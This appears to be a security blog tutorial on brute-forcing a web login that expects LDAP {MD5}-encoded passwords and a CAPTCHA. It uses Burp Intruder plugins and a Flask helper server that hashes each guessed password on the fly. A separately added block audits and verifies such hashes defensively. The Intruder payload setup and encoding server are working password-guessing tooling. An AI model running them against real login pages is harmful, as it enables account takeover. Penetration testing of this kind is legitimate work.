Login brute forcing: LDAP MD5 encryption and CAPTCHA verification
LDAP MD5 encryption with the autoDecoder plugin and the captcha-killer-modified plugin
autoDecoder example
The request body that has to be sent is:
{"username":"admin","password":"{MD5}ISMvKXpXpadDiUoOSoAfww==","code":"YJIV"}
The Intruder request is set up as follows:
{"username":"admin","password":"§1§","code":"§JOEJ§"}
The Intruder settings are as follows:



Since we only brute-force the account password in Intruder, the decryption endpoint is not needed; it simply returns the captured request unchanged:
@app.route('/decode', methods=["POST"])  # no decryption
def decrypt():
    param = request.form.get('data')  # get the POST parameter
    return param
The encryption server code is as follows:
# -*- coding:utf-8 -*-
# author:f0ngf0ng
# Brute forcing with LDAP MD5 encryption
import base64, hashlib, json
from flask import Flask, request

def hash_md5(data):
    # LDAP {MD5} value: base64 of the raw MD5 digest
    md = hashlib.md5()
    md.update(str(data).encode('utf-8'))  # hashlib needs bytes on Python 3
    a = md.digest()
    b = base64.b64encode(a).decode('ascii')
    return b

app = Flask(__name__)

@app.route('/encode', methods=["POST"])
def encrypt():
    param = request.form.get('data')  # get the POST parameter
    data = json.loads(param)
    print(data)
    # replace the plaintext with the ciphertext and add the {MD5} keyword
    encry_param = param.replace('"password":"' + data['password'], '"password":"{MD5}' + hash_md5(data['password']))
    return encry_param

@app.route('/decode', methods=["POST"])  # no decryption
def decrypt():
    param = request.form.get('data')  # get the POST parameter
    return param

if __name__ == '__main__':
    app.debug = True  # debug mode; turn debug off in production
    app.run(host="0.0.0.0", port=8888)
Run it as follows:
python flask.py
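The `{MD5}` value in the request above is base64 of an unsalted MD5 digest, so the same password always yields the same string. The following is an added example, not part of the original post: it parses such values, verifies a password against them, and contrasts them with a salted `{SSHA}` value. The function names and the scheme table are assumptions of this example; the sample value is the one from the request shown on this page.

```python
import base64
import hashlib
import hmac
import os

# scheme -> (hash name, digest size, salted); LDAP userPassword scheme names
SCHEMES = {"MD5": ("md5", 16, False), "SMD5": ("md5", 16, True),
           "SHA": ("sha1", 20, False), "SSHA": ("sha1", 20, True)}

# Value taken from the request body shown on this page
PAGE_VALUE = "{MD5}ISMvKXpXpadDiUoOSoAfww=="

def parse_userpassword(value):
    """Split '{SCHEME}base64' into (scheme, digest, salt); ValueError if malformed."""
    if not value.startswith("{") or "}" not in value:
        raise ValueError("missing {SCHEME} prefix")
    scheme, b64 = value[1:].split("}", 1)
    scheme = scheme.upper()
    if scheme not in SCHEMES:
        raise ValueError("unsupported scheme: " + scheme)
    _, size, salted = SCHEMES[scheme]
    raw = base64.b64decode(b64, validate=True)  # binascii.Error is a ValueError
    if (len(raw) <= size) if salted else (len(raw) != size):
        raise ValueError("wrong length for " + scheme)
    return scheme, raw[:size], raw[size:]

def verify(value, password):
    """Recompute the digest for `password` and compare in constant time."""
    scheme, digest, salt = parse_userpassword(value)
    calc = hashlib.new(SCHEMES[scheme][0], password.encode("utf-8") + salt).digest()
    return hmac.compare_digest(calc, digest)

def make_ssha(password, salt=None):
    """Build a salted value: base64(sha1(password + salt) + salt)."""
    salt = os.urandom(8) if salt is None else salt
    digest = hashlib.sha1(password.encode("utf-8") + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode("ascii")

def audit(value):
    """Flag the two weaknesses this example checks for: no salt, MD5."""
    scheme, _, salt = parse_userpassword(value)
    findings = []
    if not salt:
        findings.append("unsalted")
    if SCHEMES[scheme][0] == "md5":
        findings.append("md5")
    return findings

if __name__ == "__main__":
    print(audit(PAGE_VALUE), verify(PAGE_VALUE, "admin"))
    print(audit(make_ssha("admin")))
```
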
The autoDecoder settings are as follows:

The captcha-killer-modified plugin page looks like this:

The brute-force run looks like this:

